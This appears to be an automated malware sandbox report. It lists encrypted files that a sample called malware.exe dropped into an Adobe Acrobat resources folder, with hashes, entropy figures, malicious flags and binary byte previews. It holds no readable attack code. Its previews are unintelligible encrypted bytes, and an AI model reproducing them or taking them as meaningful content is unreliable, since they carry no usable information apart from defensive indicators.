                        SHA-256:CDD835CFAAB9759AF6D160BFF938099A691B7CA071CAF0C91B528FD34C91A987
                        SHA-512:AFD4938EC3CAC8F4B44FEBFD94C8EE507A93B4A11B0E6B834D6850131429296A89262962EF6F7E78E4EFF026C3C5333ECD9E819FFBDAF84874BB3B2B1AB0FCBF
                        Malicious:true
                        Preview:z....'.C.k..V7.N.~M..f._..r.)..H.......4ct...)..~./.....2.R.X`_S.....km.....'........c.)2............]....x....6~E......@/.Yr...1......X.....!R.?GX...lbz.c..^{......%.....f.....i.....J.weWB...L..o....k..;Co.ow....B.lj.WT.e.....8...d....&;.>.8...E..7.".J.vq.}.l....i...(...B..iT.7....?0.G..h....e...%.~.....P...d#h,.-....yR.@8.....E.`9g.mW/d.y.....izQ...y?......v.."I...K.[1....>ke..{B!.]2.y.Uk2.........v...a..h..f...1..(.Z..7P8@h....w.[..id0...k............U.I4j.....f3...\...6D..a.....M..(..9.%......]...$\Js..D....2.:.....U.....L.[..).\.......^.(.....w<..e..P2_...a..k&.?.....I. .*A..0$.Q.u!.g..VM.Q...#L.o\. .......|....N.b......r...O-4...=.?..e.(...\.m?k....$....=y.....[d`.q...TcS....G.n.g......8I....*.z=...\...Kz-...*'......%^@~(ob..$q;.....5k..o...$GT'~0.4z.IR.R^N.8....V...P...9..O.M....DN.@A....I.~......"..;hD..2g.*d.....4..o......O>...Dq..CAf!`.Nf..5......'@3.N.C....M ..:E..._8....ys)..BtV..@_......../...........u...}WR.].

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6823bdac587ae224bf36689600281a69.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23421
                        Entropy (8bit):7.991716819736397
                        Encrypted:true
                        SSDEEP:384:Bvnj6k7rsjLc7Ty3uXXpDNVTJQFGPZqvDsDjtzgpX3woryztLB20W:BWYi3uJDTTJi2qvsh0KL21
                        MD5:48E60FCFBA6D4BA730F1EFAC1BF8E1F3
                        SHA1:851A74AF63F95E5D86979F36F1063CC61E2E55E9
                        SHA-256:E52F93E05BC30A8FA9A3741D8885186A9F847C75472CBFFEDCCAF8E7D9B42347
                        SHA-512:9D37DF8CEEE87A4646059416A84814689413225F71A9811B6CE5ADBFAB617A5DECA47D364C292FD684484249E10390CF30D65585276507424A1BB36C52464B5D
                        Malicious:true
                        Preview:..(.i..A..v.o.g.^........$b<..PE...J.$.2...~...[.*.H....%;.i.}..^D..g+,.T/.4....$.G..f{.g<.........KD..RXh.-W2h"!..&6...'...m.A..1.W..i.."W.[J.fA*....s..~..T...z9.OdW.i..2.........qQg..Z.zih.......}.....xR....9..7...<&..z.....=..P.J.y..b..&cL...mGO...=..297Y=j.1.O=@...\ ..h...p.....OJ5.....*...Yj.....'.g....t.FS.k.q.L.......Y...?..Y0g7q.5.".p!.....m<...r...+'I lJK2.i.._.. .E..Wl..2....EN.;....WYW.....x...7>....<.Lz........{..~_4....Jd..a.'...P|e...S. .(....*_.Y|.........K<.O~....2.0..h.2....gI_...d..F..Y..h..vx.p...K#..{..|....L..j.n...l6.(F.z8.a......Rg&...L.m7.ew.U.+....d......7K/....%'..__..@.Z.,4.._I.3.~.....`..M..M...P7S2.........F2....H;...g.....h...l..3.!o.X2XE..6..b.L.pH._'...N.R^;._.3./.]?..g......)!xw[h...n..e..ut.......B.{..._.j........@...#......d..Q.~..NZv.6...V.?.B.p....wH/....=.^..].1..S..8.I.).y.&s.+L45.A...L..)yB.ka....b3#/G,r.c(&.#...I...l.{:}.$%,....#..T......\~.n.Q.E..A........J.l....-.....+....HX.+..K.t..P..o..LOx+1..P.a....N.zb

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6b0215ed0a09075330a1c6dd3dbfba1d.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20802
                        Entropy (8bit):7.990595497472989
                        Encrypted:true
                        SSDEEP:384:9h4zCxRobiLccHmqZhcN3qOAa4lsLx4muZ+1ETp6gQaxcsFsV+ho:kaRVLccHpcAOAa4lHZ+1ap65axcgswho
                        MD5:88E98876778DB746E924E66D78205B5E
                        SHA1:0ECEA5AD9548F2A5846B64E300C956314024F7BF
                        SHA-256:C06A2CC9DD148AC193BAFB7E2821A99A2C280BF878F18B9C5B1F7C1A9A893491
                        SHA-512:DAC7907952D438B0D1F789E4CD244645E5FBBC62B02FFA610F416E8B80B70A9AE86D2C5F2151393B9954C0A602D23258189CCEF426DD510ABAA678A830945CFA
                        Malicious:true
                        Preview:xK|..r.4/-.. .D....HL...-E...a...c..P..u.r......L..<.z$......y.?4....).u,.Z?....'../a.....=2.v..?..eJ.:Z...J.........q..$.......f..E. .F.<.>..ZL7...t.....k...:...h.,....*hgWf...R..i0.i.8......tC...@^...M..d..ZG.xb.Z..~.....W.w.......y.2TD.GW..@.d.[TyX.Q.F..y. .........$a.......&.I.....S.q..9...8...<-&..D....D...2..:|...a#G&..Q&.=l..[ArL..b.|..U8...F..Q..%_.u....r.....7.../-.--...q..<v8|....k.Xa^.t*....h..&.`.a.>......n.....8.j..m.3......E$.ik.9E...D...d.&.-.].!X.d.WWt.SB.U._...........b!4W4........._>X....x~...*R....=....(.ba..4.+.?I.........F..|.-8..KF...|+' D.3....=.........|/.....Jt.....z.'..YO....Le.. ...OB....zP.1`..\.1.e.xk.Q..#v+&\.U*..!X.*\..f...z.........40a3s:.R.z.7t../..h['.bpQ......<...Lq..Ax.<....lqD.mJz..eT..*L.....I.E.e9[!s+./.=.-.;i..)..R_B8.<I..c.}.....gu........"..5...#.?.B`.M..h)...B..q)...9(vp...u#o..4d..".&b:...v.....r.?.6L..5shSx....@M$.5....p.5.......|u%.]..n..{C%...4.2...).].).V..h.f....,.G"_G....}%+

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6bb09869a6cfe2a88aae68256d9456e3.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10370
                        Entropy (8bit):7.983873619858403
                        Encrypted:false
                        SSDEEP:192:Kt60AoRsabtpZzc5Z2Pc1W/itrvn4BqFLZ1yCsY/o5Vii8RvkNY2EXQ3:KglabS5Qc1aiZv4BsLAY/A8Rvk/Ey
                        MD5:0E8A4B8BC3D386F76B8F4ABD27DCDA38
                        SHA1:E76CABDCB919A0A198776789AEB9C90A36D4E741
                        SHA-256:4D8550666D981D5A81A34E39016E09A21843603969D0525F6358894A62D62AFC
                        SHA-512:D9414C1E5134406A94969BB5AEFBB8224F89E0DF710E26F50282E7C89936B5E00F89B2DCB05BF4804664FBE461647EA450C7B6B18709B0A2802B35754E81110F
                        Malicious:false
                        Preview:.........(.(A}Y....x...S\...q....VW.D.0.3.....'n.z3.O.5l...x.|.....a^HIAFs-\.b.......t.@.k..d]...|Q|Ji.J.4.r...j.ySn+tK~...dAa..l...../...g1o)?.6....r....e...B+..l...|9.6>..NKEM....K.h*....tO...qn...wr+.\.0aL?EL.....8-o-..<.oK..R..sxuH.r1..V.2...5r5&...#w..V.D.H.@.......s...I...O..+.K..8..M......7..Z..f.j...J.`.....C.>..9.....J..../.G...a.r{..X3..b8]..A..m.B3`..+..>1O.q.A"q...}..8........n.......}u.'.y`|.t!.4B.=.b/...<....)..Lt..g...f|...*..d. .\..3Or....BW.....Q..l}k...61'..a4.G.....Ywd...Z.......87....W....GC.o.u/.c&...4g..q..+...h..V..{.2Y...J.$r'`....l.o...7.!.f..|.....U.M.7.H'].............f..hu.......Q..b.E.d.....W)....2..c..]%W....)F.6AU........~..G...ive..C.a..e|\.h.{o....]G...7.w'.n.0..J.v.`..T.d......O..L.....T'.p..M.-....o..d..C.X.....".(.=...eD..t{N<.........YN.F3J.......A|B0$..~.]...3.J....=.<.4....@~1.yc....Q4......q[S.u..)C....).|.2.C....1..v...w..4..G..v..E.......XYt...........Y.q.~nB0u..o..d.b.......\#V`.._.Vc..1...._i.@..N..h.s

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\6f43d8c6da907e34ab2028ef15733412.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:PGP symmetric key encrypted data - salted -
                        Category:dropped
                        Size (bytes):599757
                        Entropy (8bit):7.9996752459754585
                        Encrypted:true
                        SSDEEP:12288:h2Zu6sVgCjn75l8GUmivUnPnmVa3tYmk7YhmMeILxVTXt8E7jXOuJMWoMxMWdzLU:h2Z/Cz75WGjII+onk/MecpPjiWoJWdzA
                        MD5:0DC1AA6294EC16ECE6977DCA2CE2C0FC
                        SHA1:BEE3839D90412B3BA6AF0ECD7D530ECA0E5F24D5
                        SHA-256:11E554066A0E8163001609332DE900EED0266052F803F2D02762899F4F81CA0B
                        SHA-512:24FB309936642BF2C1F564D49476C00F9D488B8BE95F54AB489213CFF4526762F5AA13D3CFCAD23D6A004D2E9E98DC09818E2D18450FEFDC0763DB62399E921C
                        Malicious:true
                        Preview:.w.c....gI.~.....+.O.V.../...z.].)............Z!..(.*.O...^.f....n".CX...."=w.......x.0....C<..3...<[...LE^C.......2.O..1+.>.}{..ts.l...U.0.O....P.....C.....N0AG.`.tP...{Io-...0.u\....VP.4......".<...w....,.......{..V...e.g...J......0..C....M..[:.^U%.?...1n_..R..v..*c.!....*.s.4...T.f'..(.0o_e..s.B.o. .v...[.g......C..2....$.)..*..H775^Q...&.....+...5...h9DfD ....V.:E..,..H.S.Ov..."..j.#...'.)Ey.~.vSH`..$..........6.n..+k) ..x..6s^. .-.)C..Y.......pg..'O...V@..@.-..@/.Ip..?W.PE..%k.K.......7...7.%..z"..e`t..3HU..;7.D....&....~.V...... .'....^..}G-=..+.-..>b.d....T,!.....hA4..../].:........!..........H@>.Z.....s.@ws..ZD....k...............M+.z.vGU......`*....z..D.0..-.(O..... ..<.....N8....i.e1...S*..}..I2.^-..M.%.b..(...#LB.z.'.5,N.W........C"..UQ...iJVe..zO....l.?x..a.P.y1......"..I...EW...V..k..M.U..+l.......l\bm......b...........Q.W.5...n..-X..>...b.<.N=.<...;.#RS.ZG..".....obZ..]..'.y..k].$C$...A`.Kp..7.d..'q.........N.....]..1....n-.I

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\7279-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):88412
                        Entropy (8bit):7.997944106592721
                        Encrypted:true
                        SSDEEP:1536:bUY2Um72Bqzq7PA5DQ5r6ugof387bwRHFRuM9oZIRysqGJ1p06bAywzuRceCbmFL:b/dLuUN6Ks7MZFU+oZufJDwyG31WNsNA
                        MD5:8A99D5983FCCFCE64952C16000C4937D
                        SHA1:8F58423470DCA3CC875AB66FEC50E015A3176142
                        SHA-256:23C8C4943D9DBC58D34AA9A1B5FCC811E7EEDDEB55E2DEFE133F091CEF2E2FF2
                        SHA-512:BB97F07B4E97CB656A1456497E651474F96F131E79BC3CC9EA8B059954C03B670C7833786342EDD3C0A0AE5BA016988797407123DDCFC86E2A652CFB44B638F1
                        Malicious:true
                        Preview:. ..=.@..W..'NM.Vn43mZ.f$.G..q. .+_......Z'...*.C4..,.R..Z:....J..........U `S....N.=....DT.HV.|.Y`.*.B.G,.........s`.N.o2.k".t.......U`<..n,..^..G"..."U0p}....H.~%...k..........V....e..._R....{.S9Z...........g.%....[.....jt......c....a5.5....Y...F.bkp..3....w.....Q.w...!..bkI\......p..=Y...m.Z,..o.......m...S.+^..5yD.}........at....$....|...W..=..J....g.)....[j.l.6...?.I..AQ.Jn...?...VA.4.(.n....O.qi+e.`..R...}S..x....U....L..x.&.b.R.8.....|...s.y..1.;.n..J..P.J`..C.....V..n.~l?i..u...`..:..MFs \X.Q#}..g~....`.}B......O.C.(Y) LY...I_"..2j........f.}.....4....M.,......dS..-y7.[.@......_.K/.7.... ..i...._/.~`.^&UcR.j..........\9....@....6.d.0..k+...ul.|..7.ky7.<v:.G/h......=.,1.8.......A.(w..........g...e..e.......|~.....b..]...+...)..!....?.DD@..;.X...... .N!q~^9l.75E?v.....~..w.|......k8Ac4B..O..u%......~...\..\.]/..Z6hJQ+.F.......y.q...*..h\.tid......1..6KT!CvO.WF9.0.l..T...'..D.e:..|.g....-.U..:..\.W.+!..,....1..Dw~..N..].........).

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\7296-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10422
                        Entropy (8bit):7.9822502444611105
                        Encrypted:false
                        SSDEEP:192:DfmkxlTz15n7Est28d+XP8yo6SeANROF50gptmGry9lHT+pnWB7kXq9hoPym:DfmkD7EstNduP8yo6QM5dzmGry9lSWB+
                        MD5:788EEB6FFC78B65EEA46C0EDFF5E529D
                        SHA1:3E89E71EC6B8A7A328809EC1B5D8B474B0E520F6
                        SHA-256:B0DDEA85E4E6FC1C233A99DC3AD885D8DA87DCECC8D9B7378C129B12D4AE8CBE
                        SHA-512:35C85FFD71843367DCACFFB777C210E639504718F646FA731723EE7E52682A513E462BB93609261C332B22CA42052EFB54878C53E7D66F9A39FA1F362C71F50B
                        Malicious:false
                        Preview:.......u..o2..;.Vn..[1.3w...!...<..'..!i..".......e>2..K....p.#..'m?x..n.C.*.......%y.0o.H.../..Y..+{.+..G_.v.u..M.S...r.^3.#A..f....I....}.-.h..f..D)....q-...;..@...E#....c..........#..T......].G..B.....-]W#.>.8*...J?......1....9.G}-p.....H"..7.N..........G.........Pq...w...%......<r.fs......Ml..m9M~$.8{.3G...c@..^....|7..Ke......i...5c!....+v]G..@......6.T..{y...Q.....9..:;....X..M.SH..r.H..NV.M...\..+.RE....o(...'...N.up./.Vv..V(..=....&G:........#.....q.w..F...h../7..$Z2'..[..qc.%6.PH5...."RU5...w.y....N.....w7j.... )..R45.....):.r...3. .c.....M^.......r..!.9-'g.4..F..~......[.oP....?./.i..I.u..r.. ........[I..v.xaz$......e..T...e.1.45.......V........S&"y05..s..C...FQ.w$....p.!|../...Q...J.\o3$Cu4u.F.\v.'..Zf.+fY......':A*]....w..&.7.*.co...'..q.x.C..K.`-.-vm.........1-..67...x.l.?...n.<.v.=...#..hb.D....M..N......m..g.usn..z..7..[b.|P.U....m..".4g.d6.{..&ff,.[.]hnc.....d9......O7a.......P.L.4......h.B.Og.5a0...N..,...!..@..js..2.8pH..?..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\7363-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):71943
                        Entropy (8bit):7.9974419202441
                        Encrypted:true
                        SSDEEP:1536:V3UPiDN7vQblNJdsL3yILREvkrxeU2GYNIvvkD8Y1fVvHhXU2B2qvA:tFN7vuDI3yINkkle7GUiMoYVPhXHVo
                        MD5:2B1759CD5AD3ADD9119DC10079C0579B
                        SHA1:D58597357192B5FDF2FABF049A55C273D10B507F
                        SHA-256:0209691CA6845599800DC10F27AB7DB2D75FDCA8FE3634B06D106ADEA628CD00
                        SHA-512:072D9C940AEAC9FD02F9A96CB05692E1C1D3E45E2D894E35260B5ACD8EF88BD8D8D9BF5A9D3D321FD5377881AD5D995A1E9EFCEF55AFFED4CA25E9DD647BE50F
                        Malicious:true
                        Preview:.S..O6.5....;...?......MZ.......&..$`D.....1..nR.|...%..G....h@...[~Q.r?..u..e.h........a..E.L+.&92!......!`4&....Z...n/...vf.Tm.W..?...oi..Ju..&.....;!`......K(..j..u,I..4...HJ.e..._$lK..I.D....h?..}.h..o4)..6O...00.n ...........@...........z.7Am.*.0.B@_.4........k....^.....Jd.@v.'.......c.}n...F.:(.-.Q.3U.C.-.K_..r.R.....C..RD...y.y?%.i....=0K..~z...01.4.-..l.C...v.YiG....!.9..I.5...5.. .c.."/..1.tU.3...O..g.......).*......%..4.6.)9x..:1.q(...F.....Y+/.>.v.._..J.8....O..M9.T'..2?g..p...[.eqn......q..;N#.I.!.8#.y.F..uO.L..o..;..C.....8......52f.B2...g.j.Y'd...x...fp......!..L.g.On.#.AB.....[.fOA.6a...B.,....K...F.!..B/...}...}.....N..k.....}G.=.s..!..u...Q....a.... .~(.a.....D.,...a.*...Sj..d. ..~..D.......,...V2........3is;$!).+d..\..?...@U.L.X&./.8.N|B.2zd}....IS.<..$E....H.|.@.........d7{v.G....4..n.x.O*.B.........N .(.].v..|p...A..]."]..d...U...L.9....E).Z.....C..g6.;.....&........w}.u..{.....z..I. uj..r.u?.p.4.-{...,..@........

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\7ec969a62598fbfa1ee1eb8827a0f2e5.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):140369
                        Entropy (8bit):7.998576313355336
                        Encrypted:true
                        SSDEEP:3072:iU3qBDA6ocqE/6ThW6PWl7Vn/h40/9IWmgsduBs4LywlpQMb3ra:iTcBX1durJmgkCs4LywlGMb3ra
                        MD5:AD325AE531A6B48E96BB5553E26C6A79
                        SHA1:F15B9F93E200567A7AD835DB8CFB6539F46A0119
                        SHA-256:4F97189B5903CA0B811B22C50C1634CE9DBBB03B9CC0E600937D0F623D0DA3BC
                        SHA-512:2514FDC1F422C2B77B6369A15D99DCCB2C0BB76B9AB01EE0FCE2CBFE7F64C6CC55B72CC186C07960B37F40FD6CECF0074E0CD4B2DD630D0302A9810389C9AA62
                        Malicious:true
                        Preview:6....f?..,......I..0D..k.K$.._..z.."*i...}.)ZJ!..TKO..zLjG...U..M.k.B.C..p.`..\.8...Nl....+!..dW...U.6D.q8?b;.Q.8.g.4.K.....qLk..f...y....,sJB.Yy.i.?.....x..w.c.|...;.>..*d.w....l.y........4.h...7p...q.0....O.v;.......8...O......>?..._.D.....0.....`....}.2.....,..C.....X....NGMrRC.Jt.z....-.gn. \. ....:.gW.._......4.0.K.,......khT..gO...@.Qn.......h...h._.s...[........m$...1....?.:..u.N.....2...e6u..f..:..!.B..?tL...f}.p......S...*.}.......nv.tu...E......G.Z.\.6w.........(o.B./.dK.G.W....7...+.8.]d_..3HYqZ....d....k.........dG.:.o.:..'h.C....t..:Y-..k.$.Ux..........h.._x..86.pL.l.;q;....,&0....c,..T/...4....3a..=.G..{...1....DB.6....1.C...`...xoR.......G...$...3......!....os...jP.U<.Z..x.\.9..W...oR.ZC...d.?h...,.....@.$.i.o...Q...(...2l../...."..j...L..Ln......_e.56..3-...Qk.+b5.....u..>d....c.I.....#..C...}6..;(.w..N...S1..c)c....G.SqL..^.z`.....s{.s...f...MEF...9.7..IE....S..(.....U4.!R!.f......c...]Q.g!..I.M..<...z.yMzvm..........N

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8172-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):61322
                        Entropy (8bit):7.996751236134521
                        Encrypted:true
                        SSDEEP:1536:Ta8l23K5LLGMf6FL44hLSUXEZqk8b4ZjtRn7M4:TLEKfPyFwKEZSbKtRt
                        MD5:D5C505596211E55E48E97B4AE2E2562C
                        SHA1:D04BC689A1DF204A6A7F0CE88E10C8F668B6B935
                        SHA-256:CFA1504A87B36E81D481997784DE2B033E75418C7B01B6D070DA80E77BEEE45A
                        SHA-512:6EDD5E676F1213F33CA0EEE3356C8BBEE17867F64B202BA3712A41BA983D365B96801BD1C6A438391F6E3A580EABC18EE8732517D5C1B6FE689656B1EBA09867
                        Malicious:true
                        Preview:.zQRQ{-.U:.G/..V:!^..l..........(X.I....8(7....g..9..OK....P.,'..[.uN.-N.F.W.b......b...,..D.]j./....L....5.u.r.{.#.K\.e]0.....dN..Glv#.. J._..P...Myo.Q..#>....B..<kJ'UTn-.Z...B....L..o..#...y^]...K...ig..!..\...?..4...E.b..1W%?..r.&.......*g).}...A.?Kp6..|~.p.?.E..8))$.......~PZ...,..Z...,.5bV...@...to.f...)......5..o......Xsu.....2.n.z2..qd`.._.}8......Q.u...F..??Ab.,..+J...Y.!|...6v.f.0[n..f.b.....d....K.Pm.niVu..~....U9.Nz.d}..D;H..;..<. ?O.#ZN.t.. ..u..k.(...c07-..3:.z.c%...i..W..3.3c...D..]..mg.T.......I=.A.=>.-p..W..AO.3......p...k.......E%W...LM.*[....Q.n5.}>...7...........~D6^.|.< V............ST#UZ....r*.?...7.....n.SV....r.\.33.Im............e.S..2..1..S.............s%)....R......R..sC..X(.E`..@mU/......7.\...l.Q$...-K.]}uE]...~9.....A...n..+F~........n:.../.B.....A........n;..~...'*BJ..CO...t.W.L.X..%{.tP...(\z#nl.<-......a..'.J.t......l...f f........1.@Z.....(h9...2.A.Y..DX.M?H.%^...O...,tk.}.|.....\h...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8329-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):154673
                        Entropy (8bit):7.996163471963701
                        Encrypted:true
                        SSDEEP:3072:TWzF18dGLmQ8nZ1zIJU2j0uVcMhcC1VvE7lF/0x3L8vI+msOTw+tNmE1:TW4ULmQ8nIi2j0uVcMH38haRLUxd4wk5
                        MD5:1D11AAB4CD42323E26D2A1440EB01082
                        SHA1:4F3D14FE733DE593B9E79152BEEF16DDB33EEF90
                        SHA-256:117C067704116ADC218FF106590CE872D56E468D17B261685254AAAB094D9D57
                        SHA-512:CB4D2C64388CD67EA082EF6AE72684B8ACC9AD09B080AB4F69D51A79F8FB9EF0C23ADFCB1A9C04F2100AC87DD32EFC1F1DDD6C60D8DAE398CE101B9691F66C3D
                        Malicious:true
                        Preview:W..y.-.l...Z..*k.CS..|7.WRk...B..9....&.....V.a^.P.3!..7l.H..R.m.0M...,.-y5v.n..V...S1'@.w..`....8..../P....<....f.:..x?.<.A6......(.....xZO#.;..2 ..;....6F....4..8 !.......Z.."T.A{t....1+.p.D..Mb....Md.Mp;."M..il....V..}.....A..Z.......I..B...f.R.....;(...>c....A....'..l.'t...ZH...#7.....&vl..8pn. :g..=4r..s.*..eZ-1V.s..#....:...i.J......=1....*x......;J.Z.......g.o...&.I+.5[..@(..~...|...L.s...._s.*...4.uO.M..*...6..%4K}..m'(...E..Q.....P...p.?N..M.#a.j....C.2..|..yA...$u.^...6.X...P.+.~.?.Nk.0Bdq.3|.z-.^..4..)..c.....E.$........%..:......7{...>.`1.._...Q.....M...K..B...G.hksM..>.@v..=.tu.q.v..pE......"........}Jb.'.....}..@.v...f`z.....<...1...5..CR...q..........V..wqk=.......c.....Z:WM.}..0..L*._.M4...t..f4..).....r.?....L..N...P#..CG.....Hvq...$fu.k.`{...kx..y.tN.R3..d".I.m.....M..9.6....:..*.G..;Cn..{...v2.uw.3...v{.M....9.];C.)l..z9~...4".*..]e+...`G~... ..........:E..f..@TrbB..P].)..l....'.o...&Y....Y#.E.<..2w.og.$Xh..S.e.c...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\83bf4cfa63b712c6973a0d510a7b2c99.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):313274
                        Entropy (8bit):7.999382512731406
                        Encrypted:true
                        SSDEEP:6144:NDDASlvvgGAcQ2znKCrYHCUciEpMcs4S1d0Db2ODGQ47GtCIMYY+7/5:NDDvvgGoUnZ0iUcxsAf2BQ47GtCITj5
                        MD5:E8DB0DBC368D620A5BB505F58E422291
                        SHA1:F09BA5BE2DDBB7A082CF4C72AD2945B8DE79E338
                        SHA-256:3405A52E098B813F9360FFC01778DD9DA73C9D8CE9ED3A08FA452CB4F9B5AD14
                        SHA-512:3374C80ABA416B296FF853549120C9E525BB2428A343DBB5C663A502AFE917280BDAE6BCEE1DC59C5C583197BBB8715F35555E327A751A39DE5BCEEB99102F1F
                        Malicious:true
                        Preview:j.V=..L'....Y.o.ZIW7../.K.%.v..(.<.....;.4B...7t..-..SCH.U....#...D...... \5jY..&r^....q..XK....b|..<A|...>.c...2la..5..:.+...hFW..............l...Ule|~.T....?=..S.AlS.X.....p..O%.XN.a...uHu.V..}.......[(..;.2q%.-'.^...r...Ud2....._5h........ .F;g..6)..Br....w.......L.....'.g`...'Gv.u....4.|....%..!.F...N..i#.Q..u...oV.]..2a.....#7........v./..j>.y.....RO....Vq..;..#).7...x......[G.S.....H.[......v.4U.F<k..S...2p7\.K..*M.X..c}/.-|....L...F.. ..V*..;S|.....E..0...U..y.....Y......w.T.?f.YBj...^..].g....].c.n.j..y..[.kp....J..q.....!j..V.F...b......doI...B...f..b...s..R...a..m9.>.hp.@.c.P...#.\.|..P~.\.K.g,i.:.3n..N.Z..H.s..|<Z..;P).....3.AWd._.........Oi...P...m...$..gHx..L.I`Kj.P:.uQ.....'.........!....0s.(-.t>"J6h...Tz....F....:.:OF^...[.S...t...$P.n.dB..JHa..Sc......S..Dp`j.A.AC....rIm.k.oM.a............`....&Z0P..c~.!.............E....K.3R.3$..l.a..{.r.^'...GD<........n/.j....9.!.>...[.R...Ch..`t^.6*...X.g"a.@0...q\[...-......5.....`...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8479-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):37607
                        Entropy (8bit):7.994871266851577
                        Encrypted:true
                        SSDEEP:768:rxRTNVRJS/CwQIqOiPkfohnSQiNddc1VajW4W8ip29QD6OJwsI9:l9NVREa4cfhnS5ZIVajVap2u2OJe9
                        MD5:B1735ABC0F49FC740F74A34DEEB04368
                        SHA1:0F6DFC3B1F10172AC9CBBC7B28F0FFA73EC87AB9
                        SHA-256:3FEA2ADB97BD68E30540C03526EB9A8F8184ABD7507ABAD909F5DEB0C9B9A9FA
                        SHA-512:5E6FE773A598A26B00DEEECDF9882027336AEF50C73FECAE6C871C01EF6974D8EA4AA4E0822D6F48A1E83F57B6C86D96EF8EE45AEF463267355D543B4D997366
                        Malicious:true
                        Preview:....._c....I.>.ydBn.Do.9..QN8.M..^..D..jD....&.v\@.`Q\............ ...OZU.........3...e.0..q..&g2Qf.|...#..e.l_.I.......a..l.........#s+....j....?....&.-..QC.r.(..c..+............E...U..C.~....c..h.....A).fQK...*.(}.d-.H.X(..hM..'....V.n.^......Q(|4....E..i..|#.U..:=.......<M..;&...Gz<r..........I._QZ..".S..k..y.a..P........?..rk{...*os.x..3..+....[....^9.@A...7.:....`...h.`.0^.......W...Z...!...s..:..d.w..s.y..^..<..t.{....c...^.2t.....v7.......t.....v4@n#..g....57U..61....M.../.._.K<..e2U..=.dG.....93.N.4.N{...S......Nt._.R....-,....`..^.4.:.}.B.C.Z..O.hl[. 1.Q.;.xAK8.........."u(..v..[#wTli...Q..F5W..\Jc..^.z.O......Y..;mp...T.u....%../.|J.T.K...F..zr..m..iI.....w~3..ZD_.."..E..&...Gd.8..u...I].G.f.........i}....)r....._.O...z..^g).S`d.%?..v.3...o8I..ifc..Z.Ye.....p8]<(s.....o..F..4..I<...j..q.y....Cw.J.]U...Y..!...$.<.qyj....:z<.Rn.NP....$..K...]_+FXs.M.:.......N.9....W.V...<.....3Xq=.H_....%..1........b......G..N%.....P.}:rv.q..T

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9066745ff44b689b5cc89c3d73970f01.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):130306
                        Entropy (8bit):7.998688119789374
                        Encrypted:true
                        SSDEEP:3072:iIPpk6Wtmx44i745GLyZ+fNxqaYvlTkZhnTm8QK:/xk6WtmxGUcyZmNJixMiRK
                        MD5:11918669892834BA4EC15726CDC1CDC3
                        SHA1:10C2C8F5B47143DFB63711C53606225BF8C77C8F
                        SHA-256:23DE50FE9B70AD528D3B4105D04CF650FE4DC2D5E28EFB0861B6D22B383277AF
                        SHA-512:9233C6D8CCDD7A12A2BBC6E8B5281F30B76EC3E2E092C2465262EAD58C06130AF96A18076310B5867FB3424293006D928E680660440E45F63617C749CF9C47FE
                        Malicious:true
